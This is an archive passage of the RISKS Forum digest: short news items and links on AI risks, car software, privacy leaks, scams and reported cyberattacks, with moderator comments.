    Date: Fri, 20 Jun 2025 08:02:07 -0700
    From: Lauren Weinstein <lauren@vortex.com>
    Subject: What could go wrong? - AllTrails launches AI route-making tool,
    worrying search-and-rescue members

    What could go wrong? - AllTrails launches AI route-making tool,
    worrying search-and-rescue members

    https://www.nationalobserver.com/2025/06/17/news/alltrails-ai-tool-search-rescue-members

    ------------------------------

    Date: Thu, 19 Jun 2025 23:43:42 +0000 (UTC)
    From: Steve Bacher <sebmb1@verizon.net>
    Subject: EU weighs sperm donor cap to curb risk of accidental incest

    And now for something completely different - an item which has nothing to d o with AI. ;-)

    Eight countries want to discuss an EU limit on the number of children
    conceived from a single sperm donor -- to prevent future generations from unwitting incest and psychological harms.

    Donor-conceived births are rising across Europe as fertility rates decline
    and assisted reproduction becomes more widely accessible -- including for same-sex couples and single women. But with many countries struggling to recruit enough local donors, commercial cryobanks are increasingly shipping reproductive cells known as gametes -- sperm or egg -- across borders, sometimes from the same donor to multiple countries.

    Most EU countries have national limits on how many children can be conceived from one donor -- ranging from one in Cyprus to 10 in France, Greece,
    Italy and Poland. However, there is no limit for cross-border donations, increasing the risk of potential health problems linked to a single donor,
    as well as a psychological impact on children who discover they have doze ns or even hundreds of half-siblings.

    [Ia this an egg-cell-ent move? PGN]

    ------------------------------

    Date: Thu, 19 Jun 2025 08:07:28 -0700
    From: Lauren Weinstein <lauren@vortex.com>
    Subject: ChatGPT may be eroding critical thinking skills (MIT)

    https://time.com/7295195/ai-chatgpt-google-learning-school/

    ------------------------------

    Date: Thu, 19 Jun 2025 01:43:14 +0000 (UTC)
    From: Steve Bacher <sebmb1@verizon.net>
    Subject: Meta's Privacy Screwup Reveals How People Really See AI Chatbots
    (NYMag)

    https://nymag.com/intelligencer/article/metas-privacy-goof-shows-how-people-really-use-ai-chatbots.html

    ------------------------------

    Date: Sun, 15 Jun 2025 11:59:23 -0700
    From: Lauren Weinstein <lauren@vortex.com>
    Subject: Tesla blows past stopped school bus and hits kid-sized dummies in
    Full Self-Driving tests (Enadget)

    https://www.engadget.com/transportation/tesla-blows-past-stopped-school-bus-and-hits-kid-sized-dummies-in-full-self-driving-tests-183756251.html

    ------------------------------

    Date: Wed, 18 Jun 2025 20:14:13 -0700
    From: geoff goodfellow <geoff@iconia.com>
    Subject: Couple steals back their own car after tracking an AirTag in it

    *When London police wouldn't recover a stolen car despite an AirTag giving
    its location, the owners say they tracked it down and stole it back for themselves...* [...]

    https://appleinsider.com/articles/25/06/13/couple-steals-back-their-own-car-after-tracking-an-airtag-in-it

    ------------------------------

    Date: Fri, 13 Jun 2025 14:50:31 -0400
    From: "Steven J. Greenwald" <greenwald.steve@gmail.com>
    Subject: Finger Grease Mitigation for Tesla PIN Pad

    From Tesla, a post about how they have mitigated a threat to thieves
    trying to figure out a user's PIN by checking for finger grease on the
    touchscreen.

    "If you set up PIN to drive, a thief would not be able to drive off in your Tesla, even if they somehow gain access to your keycard, phone or vehicle

    "The PIN pad also appears in a slightly different place on the screen every time, so finger grease doesn't give away your PIN.''

    Link to source post on X:
    https://x.com/Tesla/status/1933516310475952191

    ------------------------------

    Date: Mon, 16 Jun 2025 15:15:43 -0700
    From: Lauren Weinstein <lauren@vortex.com>
    Subject: San Francisco bicyclist sues over crash involving 2 Waymo cars

    https://www.siliconvalley.com/2025/06/10/san-francisco-bicyclist-crash-waymo/

    ------------------------------

    Date: Tue, 17 Jun 2025 11:35:42 -0700
    From: "Jim" <jgeissman@socal.rr.com>
    Subject: I lost Spectrum for about two hours

    Would-be copper thieves caused Internet outage affecting LA and Ventura
    counties (LA Times)

    https://www.latimes.com/california/story/2025-06-15/would-be-copper-thieves- cause-internet-outage-affecting-l-a-ventura-counties

    ------------------------------

    Date: Tue, 17 Jun 2025 11:36:31 -0700
    From: "Jim" <jgeissman@socal.rr.com>
    Subject: How scammers are using AI to steal college financial aid (LA Times)

    https://www.latimes.com/california/story/2025-06-17/how-scammers-are-using-a i-to-steal-college-financial-aid

    Fake college enrollments have surged as crime rings deploy "ghost students," chatbots that join online classrooms and stay just long enough to collect a financial aid check. In some cases, professors discover almost no one in
    their class is real.

    ------------------------------

    Date: Fri, 13 Jun 2025 14:24:09 -0400
    From: Gabe Goldberg <gabe@gabegold.com>
    Subject: U.S. air traffic control still runs on Windows 95 and floppy
    disks (Ars Technica)

    Agency seeks contractors to modernize decades-old systems within four years.

    On Wednesday, acting FAA Administrator Chris Rocheleau told the House Appropriations Committee that the Federal Aviation Administration plans to replace its aging air traffic control systems, which still rely on floppy
    disks and Windows 95 computers, Tom's Hardware reports. The agency has
    issued a Request For Information to gather proposals from companies willing
    to tackle the massive infrastructure overhaul.

    "The whole idea is to replace the system. No more floppy disks or paper strips," Rocheleau said during the committee hearing. Transportation
    Secretary Sean Duffy called the project "the most important infrastructure project that we've had in this country for decades," describing it as a bipartisan priority.

    Most air traffic control towers and facilities across the US currently
    operate with technology that seems frozen in the 20th century, although that isn't necessarily a bad thing—when it works. Some controllers currently use paper strips to track aircraft movements and transfer data between systems using floppy disks, while their computers run Microsoft's Windows 95
    operating system, which launched in 1995.

    https://arstechnica.com/information-technology/2025/06/faa-to-retire-floppy-disks-and-windows-95-amid-air-traffic-control-overhaul/

    ------------------------------

    Date: Wed, 11 Jun 2025 19:02:24 -0700
    From: "Jim" <jgeissman@socal.rr.com>
    Subject: States sue to block the sale of genetic data collected by DNA
    testing company 23andMe (LA Times)

    Dozens of states have filed a joint lawsuit <https://www.washingtonpost.com/documents/809d3c27-44d5-4042-80a2-3ea3c1743d b2.pdf> against the bankrupt DNA-testing company 23andMe to block the
    company's sale of its customers' genetic data without explicit consent.

    The suit, filed this week in U.S. Bankruptcy Court in the Eastern District
    of Missouri, comes months after 23andMe began a court-supervised sale
    process of its assets.

    The South San Francisco-based venture was once valued at $6 billion and has collected DNA samples from more than 15 million customers.

    https://www.latimes.com/business/story/2025-06-11/23andme-bankruptcy-follow

    ------------------------------

    From: "Steven J. Greenwald" <greenwald.steve@gmail.com>
    Date: Tue, 10 Jun 2025 15:29:47 -0400
    Subject: Using Malicious Image Patches in Social Media to Hijack AI Agents

    From the thread posted on X by the researchers: "Beware: Your AI assistant could be hijacked just by encountering a malicious image online! "Our
    latest research exposes critical security risks in AI assistants. An
    attacker can hijack them by simply posting an image on social media and
    waiting for it to be captured."

    ------------------------------

    Date: Wed, 11 Jun 2025 09:16:25 -0700
    From: "Jim" <jgeissman@socal.rr.com>
    Subject: Weather precision loss

    As of today (11 June 2025) the NWS forecast for Van Nuys (3 mi SE of the observation site at KVNY Van Nuys Airport) has been changed from that
    specific location to the "Western San Fernando Valley", a larger area. Presumably other point forecasts in the region have also changed. For
    example, yesterday's forecast was for a high of 89; today it says "in the
    80s to around 90". Also, the forecast for Simi Valley has been broadened to "Southeastern Ventura County Valleys" with a range of temperatures instead
    of a single number. Is this a response to falling staff numbers?

    [They could get rid of a huge number of sensors and staff by aggregating
    larger areas. Where I live there are microclimates from San Fran to
    surroundings with variations of sometimes 55-degree differences within a
    30-mile radius. I suppose this strategy could lead to large-area
    predictions of 55 to 110 for the whole Bay Area. That would not be very
    helpful. PGN]

    ------------------------------

    Date: Thu, 5 Jun 2025 06:02:06 -0700
    From: Rob Slade <rslade@gmail.com>
    Subject: Grief scams on Facebook

    In a very short space of time I have had multiple romance/grief scams
    contacts on Fakebook--all of them (within the first few messages) telling me
    "I can't send you friend request," and either instructing or implying that I should attempt to "friend" them, or contact them via private messaging.

    (Interestingly, in one case, despite the fact that my email address was available, the scammer did *not*, in fact, contact me via email.)

    Facebook/Meta is lousy at protecting its users from such scams. But I
    assume that, somewhere in the bowels of the "algorithm," there is some awareness of the types of messages that scammers send their "friends," and
    thus the scammers have learned to avoid "friending" too many marks at a
    time. I also assume that these attempts are part of an organized scam
    "farm" operation, given the frequency and consistency of the attempts on Facebook, and the avoidance of email.

    ------------------------------

    Date: Sat, 28 Oct 2023 11:11:11 -0800
    From: RISKS-request@csl.sri.com
    Subject: Abridged info on RISKS (comp.risks)

    The ACM RISKS Forum is a MODERATED digest. Its Usenet manifestation is
    comp.risks, the feed for which is donated by panix.com as of June 2011.
    SUBSCRIPTIONS: The mailman Web interface can be used directly to
    subscribe and unsubscribe:
    http://mls.csl.sri.com/mailman/listinfo/risks

    SUBMISSIONS: to risks@CSL.sri.com with meaningful SUBJECT: line that
    includes the string `notsp'. Otherwise your message may not be read.
    *** This attention-string has never changed, but might if spammers use it.
    SPAM challenge-responses will not be honored. Instead, use an alternative
    address from which you never send mail where the address becomes public!
    The complete INFO file (submissions, default disclaimers, archive sites,
    copyright policy, etc.) has moved to the ftp.sri.com site:
    <risksinfo.html>.
    *** Contributors are assumed to have read the full info file for guidelines!

    OFFICIAL ARCHIVES: http://www.risks.org takes you to Lindsay Marshall's
    delightfully searchable html archive at newcastle:
    http://catless.ncl.ac.uk/Risks/VL.IS --> VoLume, ISsue.
    Also, ftp://ftp.sri.com/risks for the current volume/previous directories
    or ftp://ftp.sri.com/VL/risks-VL.IS for previous VoLume
    If none of those work for you, the most recent issue is always at
    http://www.csl.sri.com/users/risko/risks.txt, and index at /risks-34.00
    ALTERNATIVE ARCHIVES: http://seclists.org/risks/ (only since mid-2001)
    *** NOTE: If a cited URL fails, we do not try to update them. Try
    browsing on the keywords in the subject line or cited article leads.
    Apologies for what Office365 and SafeLinks may have done to URLs.
    Special Offer to Join ACM for readers of the ACM RISKS Forum:
    <http://www.acm.org/joinacm1>

    ------------------------------

    End of RISKS-FORUM Digest 34.68
    ************************



  • From RISKS List Owner@risko@csl.sri.com to risks-resend@csl.sri.com on Sat Oct 11 17:56:28 2025
    Content-Type: text/plain; charset=UTF-8
    Content-Transfer-Encoding: 8bit
    precedence: bulk
    Subject: Risks Digest 34.77

    RISKS-LIST: Risks-Forum Digest Saturday 11 October 2025 Volume 34 : Issue 77

    ACM FORUM ON RISKS TO THE PUBLIC IN COMPUTERS AND RELATED SYSTEMS (comp.risks) Peter G. Neumann, founder and still moderator

    ***** See last item for further information, disclaimers, caveats, etc. ***** This issue is archived at <http://www.risks.org> as
    <http://catless.ncl.ac.uk/Risks/34.77>
    The current issue can also be found at
    <http://www.csl.sri.com/users/risko/risks.txt>

    Contents: [Long gap. Working backwards. I'm still human. PGN]
    How the World's Biggest Car-Makers Fell Behind in Software (FT)
    Why Are Car Software Updates Still So Bad? (WiReD via Gabe Goldberg)
    A delivery robot collided with a disabled man on L.A. street.
    The aftermath is getting ugly (LA Times via Steve Bacher)
    Scientists grow mini human brains to power computers (BBC)
    Apple Announces $2 Million Bug Bounty Reward for the Most Dangerous Exploits
    (WiReD)
    Every question you ask, every comment you make, will be recording you
    (The Register)
    EU to Expand Satellite Defenses After GPS Jamming of EC President's Flight
    (Franklin Okeke)
    NIST Enhances Security Controls for Improved Patching (Arielle Waldman)
    When AI Came for Hollywood (The NY Times)
    Small numbers of poisoned samples can wreck LLM AI models of any size
    (Cornell Study)
    Taco Bell Rethinks Future of Voice AI at Drive-Through (Isabelle Bousquette)
    AI Tool Identifies 1,000 'Questionable' Scientific Journals (Daniel Strain) Stanford Study: AI is destroying job prospects for younger workers
    especially in computing (Digital Economy)
    The dangers of AI coding (Lauren Weinstein)
    AI safety tool flags student activity, spurs debate on privacy and accuracy
    (san.com)
    The AI Prompt That Could End the World (The NY Times)
    Recruiters Use AI to Scan Resumes; Applicants Are Trick It (The NYT Times) Tristan Harris on The Dangers of Unregulated AI on Humanity and the
    Workforce (The Daily Show YouTube)
    The popular conception was that AI would be a danger to civilization because
    AI would be so smart, but the reality turns out to be the danger is that AI
    is so stupid. (Lauren Weinstein)
    AI Data Centers Are an Even Bigger Disaster Than Previously Thought
    (Futurism)
    Microsoft's agent mode is a tool for generating fake data (Pivot to AI)
    Cheer Up, or Else. China Cracks Down on the Haters and Cynics (NYT)
    Criminals offer reporter money to hack BBC (BBC)
    Tech billionaires seem to be doom prepping. Should we all be worried? (BBC) Japan faces Asahi beer shortage after cyber-attack (BBC)
    New WireTap Attack Extracts Intel SGX ECDSA Key via DDR4 Memory-Bus
    Interposer (The Hacker News)
    Exploit Allows for Takeover of Fleets of Unitree Robots (Evan Ackerman)
    Google Says 90% of Tech Workers Are Now Using AI at Work (Lisa Eadicicco)
    Neon buys phone calls to train AI, then leaks them all (Martin Ward)
    Government ID data used for age verification stolen (This week in Security) Federal cyber agency warns of 'serious and urgent' attack on tech used by
    remote workers (CBC)
    Billions of Dollars ‘Vanished’: Low-Profile Bankruptcy Rings Alarms on Wall
    Street (The New York Times)
    911 Service Is Restored in Louisiana and Mississippi
    How an Internet mapping glitch turned a random Kansas farm into a digital
    hell (Fusion)
    Microsoft cuts off cloud services to Israeli military unit (NBC)
    ShareFile website (Martin Ward)
    Abridged info on RISKS (comp.risks)

    ----------------------------------------------------------------------

    Date: Wed, 3 Sep 2025 11:30:54 -0400 (EDT)
    From: ACM TechNews <technews-editor@acm.org>
    Subject: How the World's Biggest Car-Makers Fell Behind in Software (FT)

    Kana Inagaki, Harry Dempsey and David Keohane, Financial Times (08/28/25),
    via ACM TechNews

    Legacy automakers are struggling to keep pace with Tesla and Chinese
    electric vehicle makers in the race to build software-defined vehicles.
    Despite hiring tech talent and investing billions, companies like Toyota, Volkswagen, and Volvo face buggy platforms, delays, and rising costs.
    Carmakers are partnering with tech giants like Google, Nvidia, and Rivian,
    but tensions remain over control of data and systems.

    ------------------------------

    Date: Sun, 5 Oct 2025 14:17:02 -0400
    From: Gabe Goldberg <gabe@gabegold.com>
    Subject: Why Are Car Software Updates Still So Bad? (WiReD)

    Over-the-air upgrades can not only transform your ride, they can help car=makers slash costs. Here's why they’re still miles away from being seamless.

    https://www.wired.com/story/why-are-car-software-updates-still-so-bad/

    Omits two critical issues: security of updates, preventing malware. And bricking cars -- though "bricking" is in a section heading, but only meaning reducing function rather than -- you know, making a car useless.

    I badgered auto execs about these issues and got nothing but "it'll be wonderful".

    ------------------------------

    Date: Fri, 26 Sep 2025 07:15:09 -0700
    From: Steve Bacher <sebmb1@verizon.net>
    Subject: A delivery robot collided with a disabled man on L.A. street.
    The aftermath is getting ugly (LA Times)

    A collision in West Hollywood between a delivery robot and a man using a mobility scooter went viral, generating attacks on the robot company and
    on the man himself.

    https://www.latimes.com/california/story/2025-09-25/viral-video-of-delivery-robot-colliding-with-man-in-wheelchair-sparks-accessibility-debate

    ------------------------------

    Date: Sat, 4 Oct 2025 17:30:25 -0600
    From: Matthew Kruk <mkrukg@gmail.com>
    Subject: Scientists grow mini human brains to power computers (BBC)

    https://www.bbc.com/news/articles/cy7p1lzvxjro

    It may have its roots in science fiction, but a small number of researchers
    are making real progress trying to create computers out of living cells.

    Welcome to the weird world of biocomputing.

    Among those leading the way are a group of scientists in Switzerland, who I went to meet.

    One day, they hope we could see data centres full of "living" servers which replicate aspects of how artificial intelligence (AI) learns - and could
    use a fraction of the energy of current methods.

    ------------------------------

    Date: Fri, 10 Oct 2025 12:28:32 -0400
    From: Gabe Goldberg <gabe@gabegold.com>
    Subject: Apple Announces $2 Million Bug Bounty Reward for the Most Dangerous
    Exploits (WiReD)

    With the mercenary spyware industry booming, Apple VP Ivan Krstić tells
    WIRED that the company is also offering bonuses that could bring the max
    total reward for iPhone exploits to $5 million.

    https://www.wired.com/story/apple-announces-2-million-bug-bounty-reward/

    Apple Took Down These ICE-Tracking Apps. The Developers Aren't Giving Up. “We are going to do everything in our power to fight this,” says ICEBlock developer Joshua Aaron after Apple removed his app from the App
    Store.

    https://www.wired.com/story/apple-took-down-ice-tracking-apps-their-developers-arent-giving-up/

    ------------------------------

    Date: Mon, 18 Aug 2025 16:53:36 -0400
    From: Gabe Goldberg <gabe@gabegold.com>
    Subject: Every question you ask, every comment you make, will be
    recording you (The Register)

    When you're asking AI chatbots for answers, they're data-mining you

    https://www.theregister.com/2025/08/18/opinion_column_ai_surveillance/?td=rt-3a

    ------------------------------

    Date: Wed, 3 Sep 2025 11:30:54 -0400 (EDT)
    From: ACM TechNews <technews-editor@acm.org>
    Subject: EU to Expand Satellite Defenses After GPS Jamming of EC
    President's Flight (Franklin Okeke)

    Franklin Okeke, Computing (U.K.) (09/02/25), via ACM TechNews

    The European Union (EU) plans to deploy additional satellites in low Earth orbit to strengthen its ability to detect GPS interference, following an incident targeting European Commission (EC) President Ursula von der Leyen's flight. Pilots reportedly had to rely on paper maps to land von der Leyen's plane safely in Plovdiv, Bulgaria. An EU spokesperson said Bulgarian authorities suspect Russia was behind the jamming, though the Kremlin denies involvement. Similar GPS disruptions have affected the Baltic region and previous EU and U.K. flights.

    ------------------------------

    Date: Wed, 3 Sep 2025 11:30:54 -0400 (EDT)
    From: ACM TechNews <technews-editor@acm.org>
    Subject: NIST Enhances Security Controls for Improved Patching
    (Arielle Waldman)

    Arielle Waldman, Dark Reading (09/02/25), via ACM TechNews

    The U.S. National Institute of Standards and Technology (NIST) updated its Security and Privacy Control catalog to improve software patch and update management. The revisions focus on three key areas: standardized logging
    syntax to speed incident response, root-cause analysis to address underlying software issues, and designing systems for cyber-resiliency to maintain critical functions under attack. The update also emphasizes least-privilege access, flaw-remediation testing, and coordinated notifications.

    ------------------------------

    Date: Sat, 4 Oct 2025 22:23:13 -0600
    From: Matthew Kruk <mkrukg@gmail.com>
    Subject: When AI Came for Hollywood (The NY Times)

    https://www.nytimes.com/2025/10/04/opinion/ai-hollywood-tilly-norwood-actress.html

    In the immortal words of Emily Blunt, ``Good Lord, we're screwed.''

    She was on a podcast with Variety Monday when she was handed a headline
    about cinema's latest sensation, Tilly Norwood.

    Agents are circling the hot property, a fresh-faced young British brunette actress who is attracting global attention.

    Norwood is AI, and Blunt is P.O.ed. In fact, she says, she's terrified.

    Told that Tilly's creator, Eline Van der Velden, a Dutch former actress
    with a masters in physics, wants her to be the next Scarlett Johansson,
    Blunt protested. But we have Scarlett Johansson. (Cue the Invasion of
    the Body Snatchers music.)

    [This item follows Matthew's earlier item:
    She can fight monsters, flee explosions, and even cry on Graham Norton --
    but Tilly Norwood is no Hollywood darling.
    https://www.cbc.ca/news/entertainment/ai-actress-backlash-1.7647478
    I wonder if her eyes have back-lashes? I am afraid some of you may be
    her pupils, in which she should have been named IRIS. Tilly seems Silly.
    unless money is flowing into the Till(y). But she is certainly proof
    that AI has no limits. PGN]

    ------------------------------

    Date: Thu, 9 Oct 2025 14:25:42 -0700
    From: Lauren Weinstein <lauren@vortex.com>
    Subject: Small numbers of poisoned samples can wreck LLM AI models of any
    size (Cornell Study)

    https://arxiv.org/pdf/2510.07192

    ------------------------------

    Date: Wed, 3 Sep 2025 11:30:54 -0400 (EDT)
    From: ACM TechNews <technews-editor@acm.org>
    Subject: Taco Bell Rethinks Future of Voice AI at Drive-Through
    (Isabelle Bousquette)

    Isabelle Bousquette, The Wall Street Journal (08/29/25), via ACM TechNews

    Taco Bell has seen mixed results in its experiment with voice AI ordering at over 500 drives-through. Customers have reported glitches, delays, and even trolled the system with absurd orders, prompting concerns about reliability. The fastfood chain's Dane Mathews acknowledged the technology sometimes disappoints, noting it may not suit all locations, especially high-traffic ones. The chain is reassessing where AI adds value and when human staff
    should step in.

    ------------------------------

    Date: Wed, 3 Sep 2025 11:30:54 -0400 (EDT)
    From: ACM TechNews <technews-editor@acm.org>
    Subject: AI Tool Identifies 1,000 'Questionable' Scientific Journals
    (Daniel Strain)

    Daniel Strain, CU Boulder Today (08/28/25), via ACM TechNews

    Computer scientists at the University of Colorado Boulder developed an AI platform to identify questionable or "predatory" scientific journals. These journals often charge researchers high fees to publish work without proper
    peer review, undermining scientific credibility. The AI, trained on data
    from the non-profit Directory of Open Access Journals, analyzed 15,200
    journals and flagged over 1,400 as suspicious, with human experts later confirming more than 1,000 as likely problematic. The tool evaluates
    editorial boards, website quality, and publication practices.

    ------------------------------

    Date: Tue, 26 Aug 2025 07:04:13 -0700
    From: Lauren Weinstein <lauren@vortex.com>
    Subject: Stanford Study: AI is destroying job prospects for younger workers
    especially in computing (Digital Economy)

    The Big Tech Billionaire CEO are toasting the destruction of young
    people's lives. THEY DO NOT CARE ABOUT YOU. -L

    https://digitaleconomy.stanford.edu/wp-content/uploads/2025/08/Canaries_BrynjolfssonChandarChen.pdf

    ------------------------------

    Date: Sat, 4 Oct 2025 09:02:12 -0700
    From: Lauren Weinstein <lauren@vortex.com>
    Subject: The dangers of AI coding

    I am SO glad I phased out of most coding years ago, except as needed for my
    own systems. Those jobs are toast. But the dangers are very real.

    Just now I needed a Bash script for a network monitoring task. I must have written dozens of these in various forms over the years. Pings and status
    flags and the usual stuff.

    So this time, just for the hell of it, I asked Gemini (free version of
    course) to do it:

    "write me a bash script that will ping a specific ip address and when the
    pings start failing keep trying to ping and then when the pings are
    successful again send a specific curl command to that ip address"

    wAnd about 10 seconds or less later out came a completely reasonable
    looking, nicely commented Bash script, along with a reminder to make
    the file executable and how to stop it with ^C.

    This of course is a very simple, really trivial task, and I was able to
    quickly read through the code and verify that it looked correct.

    The problem of course is obvious. I could do this verification only because
    I have enough skill to easily write that code MYSELF, it would just take me more time. If the code were more complex and/or voluminous, just checking
    could range from very lengthy to utterly impractical to do at all, meaning
    any errors could go undetected with everything that implies, especially for dangerous "sleeper" bugs.

    There may be a useful analogy to vehicle driver assist systems, that may
    lull drivers into being less attentive and causing them to be unable to
    respond to emergency situations quickly when their intervention is most required.

    Crashing code and crashing cars. All very dangerous.

    ------------------------------

    Date: Thu, 25 Sep 2025 14:54:28 -0400
    From: Gabe Goldberg <gabe@gabegold.com>
    Subject: AI safety tool flags student activity, spurs debate on privacy and
    accuracy (san.com)

    https://san.com/cc/ai-safety-tool-flags-student-activity-spurs-debate-on-privacy-and-accuracy/

    In federal lawsuit, students allege Lawrence school district's AI
    surveillance tool violates their rights

    https://lawrencekstimes.com/2025/08/01/usd497-gaggle-lawsuit-filed/

    ------------------------------

    Date: Fri, 10 Oct 2025 15:48:55 -0600
    From: Matthew Kruk <mkrukg@gmail.com>
    Subject: The AI Prompt That Could End the World (The NY Times)

    https://www.nytimes.com/2025/10/10/opinion/ai-destruction-technology-future.html

    How much do we have to fear from AI, really? It's a question I've been
    masking experts since the debut of ChatGPT in late 2022.

    The AI pioneer Yoshua Bengio, a computer science professor at the Universit=C3=A9 de Montr=C3=A9al, is the most-cited researcher alive, in any discipline. When I spoke with him in 2024, Dr. Bengio told me that he had trouble sleeping while thinking of the future. Specifically, he was worried that an AI would engineer a lethal pathogen == some sort of
    super-coronavirus -- to eliminate humanity. ``I don't think there's
    anything close in terms of the scale of danger,'' he said.

    Contrast Dr. Bengio's view with that of his frequent collaborator Yann
    LeCun, who heads AI research at Mark Zuckerberg's Meta. Like Dr. Bengio,
    Dr. LeCun is one of the world's most-cited scientists. He thinks that AI
    will usher in a new era of prosperity and that discussions of existential
    risk are ridiculous. ``You can think of A.I. as an amplifier of human intelligence,'' he said in 2023.

    ------------------------------

    Date: Thu, 9 Oct 2025 15:24:59 -0400
    From: Gabe Goldberg <gabe@gabegold.com>
    Subject: Recruiters Use AI to Scan Resumes; Applicants Are Trying to Trick
    It (The NYT Times)

    In an escalating cat-and-mouse game, job hunters are trying to fool AI into moving their applications to the top of the pile with embedded instructions.

    https://www.nytimes.com/2025/10/07/business/ai-chatbot-prompts-resumes.html?smid=nytcore-ios-share&referringSource=articleShare

    ...read comments.

    ------------------------------

    Date: Wed, 8 Oct 2025 17:28:53 -0400
    From: Gabe Goldberg <gabe@gabegold.com>
    Subject: Tristan Harris on The Dangers of Unregulated AI on Humanity and
    the Workforce (The Daily Show YouTube)

    “This does not have to be our destiny.” Co-founder of the Center for Humane Technology Tristan Harris sits down with Jon Stewart to discuss how AI has already disrupted the workforce as current iterations of the technology have dropped entry-level work by 13%, tech companies prioritization of their first-to-market stance over product and human safety, and how reliance on AI
    is stifling human growth. #DailyShow #TristanHarris #AI

    https://www.youtube.com/watch?v=675d_6WGPbo

    [Also noted by Matthew Kruk. PGN]

    ------------------------------

    Date: Tue, 7 Oct 2025 08:25:38 -0700
    From: Lauren Weinstein <lauren@vortex.com>
    Subject: The popular conception was that AI would be a danger to
    civilization because AI would be so smart, but the reality turns out to be
    the danger is that AI is so stupid.

    ------------------------------

    Date: Sat, 11 Oct 2025 08:52:15 -0700
    From: Lauren Weinstein <lauren@vortex.com>
    Subject: AI Data Centers Are an Even Bigger Disaster Than Previously Thought
    (Futurism)

    https://futurism.com/future-society/ai-data-centers-finances

    ------------------------------

    Date: Thu, 2 Oct 2025 11:00:41 +0100
    From: Martin Ward <martin@gkc.org.uk>
    Subject: Microsoft's agent mode is a tool for generating fake data
    (Pivot to AI via YouTube)

    Microsoft has put a co-pilot document generator into the online version of Office 365, called "agent mode". Quote: "In the same way, Vibe coding has transformed software development, the latest reasoning models in C-Pilot
    unlock agentic productivity for office artifacts"

    This is a gadget for faking evidence.

    Security researcher Kevin Bowmont gave agent mode a good try out. He asked
    it: "Make a spreadsheet about how our endpoint detection response tool
    blocks 100% of ransomware." It did exactly that. It made up a spreadsheet
    of completely fake data about the product's effectiveness. With graphs.

    Pivot to AI report:
    https://www.youtube.com/watch?v=kH59-8dD08g

    ------------------------------

    Date: Tue, 7 Oct 2025 23:09:51 -0600
    From: Matthew Kruk <mkrukg@gmail.com>
    Subject: Cheer Up, or Else. China Cracks Down on the Haters and Cynics (NYT)

    https://www.nytimes.com/2025/10/08/world/asia/china-censorship-pessimism-despair.html

    As China struggles with economic discontent, Internet censors are silencing those who voice doubts about work, marriage, or simply sigh too loudly
    online.

    ------------------------------

    Date: Mon, 29 Sep 2025 11:45:38 -0600
    From: Matthew Kruk <mkrukg@gmail.com>
    Subject: Criminals offer reporter money to hack BBC (BBC)

    https://www.bbc.com/news/articles/c3w5n903447o

    Like many things in the shadowy world of cyber-crime, an insider threat is something very few people have experience of.

    Even fewer people want to talk about it.

    But I was given a unique and worrying experience of how hackers can
    leverage insiders when I myself was recently propositioned by a criminal
    gang.

    "If you are interested, we can offer you 15% of any ransom payment if you
    give us access to your PC."

    ------------------------------

    Date: Thu, 9 Oct 2025 20:54:45 -0600
    From: Matthew Kruk <mkrukg@gmail.com>
    Subject: Tech billionaires seem to be doom prepping. Should we all be
    worried? (BBC)

    https://www.bbc.com/news/articles/cly17834524o

    Mark Zuckerberg is said to have started work on Koolau Ranch, his sprawling 1,400-acre compound on the Hawaiian island of Kauai, as far back as 2014.

    It is set to include a shelter, complete with its own energy and food
    supplies, though the carpenters and electricians working on the site were banned from talking about it by non-disclosure agreements, according to a report by Wired magazine. A six-foot wall blocked the project from view of
    a nearby road.

    Asked last year if he was creating a doomsday bunker, the Facebook founder
    gave a flat "no". The underground space spanning some 5,000 square feet is,
    he explained, is "just like a little shelter, it's like a basement".

    ------------------------------

    Date: Fri, 3 Oct 2025 06:36:32 -0600
    From: Matthew Kruk <mkrukg@gmail.com>
    Subject: Japan faces Asahi beer shortage after cyber-attack (BBC)

    https://www.bbc.com/news/articles/c0r0y14ly5ro

    Japan is facing a shortage of Asahi products, including beer and bottled
    tea, as the drinks giant grapples with the impact of a major cyber-attack
    that has affected its operations in the country.

    Most of the Asahi Group's factories in Japan have been at a standstill
    since Monday, after the attack hit its ordering and delivering systems.

    Major Japanese retailers, including 7-Eleven and FamilyMart, have now
    warned customers to expect shortages of Asahi products.

    [A kiss is just a kiss, Asahi is just a sigh, as time goes by(e)...
    Casablanca. We'll always have Paris for wine -- and bierre. PGN]

    ------------------------------

    Date: Sat, 4 Oct 2025 01:23:59 +0000
    From: Victor Miller <victorsmiller@gmail.com>
    Subject: New WireTap Attack Extracts Intel SGX ECDSA Key via DDR4 Memory-Bus
    Interposer (The Hacker News)

    https://thehackernews.com/2025/10/new-wiretap-attack-extracts-intel-sgx.html?m=1

    ------------------------------

    Date: Mon, 29 Sep 2025 11:22:12 -0400 (EDT)
    From: ACM TechNews <technews-editor@acm.org>
    Subject: Exploit Allows for Takeover of Fleets of Unitree Robots
    (Evan Ackerman)

    Evan Ackerman, *IEEE Spectrum* (09/25/25), via ACM TechNews

    Security researchers disclosed a critical Bluetooth Low Energy vulnerability
    in several robots manufactured by Chinese robotics company Unitree that
    gives attackers full root access and enables worm-like self-propagation
    between nearby devices. The exploit, called UniPwn, affects Unitree's Go2
    and B2 quadrupeds as well as its G1 and H1 humanoids, and arises from
    hardcoded encryption keys and insufficient packet validation. Attackers can inject malicious code disguised as Wi-Fi credentials, leading to persistent compromise and potential botnet formation.

    ------------------------------

    Date: Fri, 26 Sep 2025 11:32:18 -0400 (EDT)
    From: ACM TechNews <technews-editor@acm.org>
    Subject: Google Says 90% of Tech Workers Are Now Using AI at Work
    (Lisa Eadicicco)

    Lisa Eadicicco, CNN (09/23/25), via ACM TechNews

    Of 5,000 global technology professionals surveyed by Google's DORA research decision, the vast majority (90%) said they now use AI in their jobs, up
    from just 14% who did so in 2024. However, the survey found only 20% of respondents place "a lot" of trust in the quality of AI-generated code, compared to 23% who trust it "a little" and 46% who trust it "somewhat."

    ------------------------------

    Date: Sat, 27 Sep 2025 10:48:55 +0100
    From: Martin Ward <martin@gkc.org.uk>
    Subject: Neon buys phone calls to train AI, then leaks them all

    Neon Mobile is an app that sells your phone calls to AI companies for
    training, and pays you 15–30 cents per minute!

    Could there be a RISK of all this personal data leaking?

    One day after reporting on the new app, Techcrunch reported that Neon's publicly accessible web site listed "data about the most recent calls made
    by the app’s users, as well as providing public web links to their raw audio files and the transcript text"

    Pivot to AI report:
    https://www.youtube.com/watch?v=G_LKccOiCoo

    ------------------------------

    Date: Sat, 4 Oct 2025 07:23:13 -0700
    From: Lauren Weinstein <lauren@vortex.com>
    Subject: Government ID data used for age verification stolen
    (This Week in Security)

    [Gee, as if nobody predicted stuff like this, huh?]

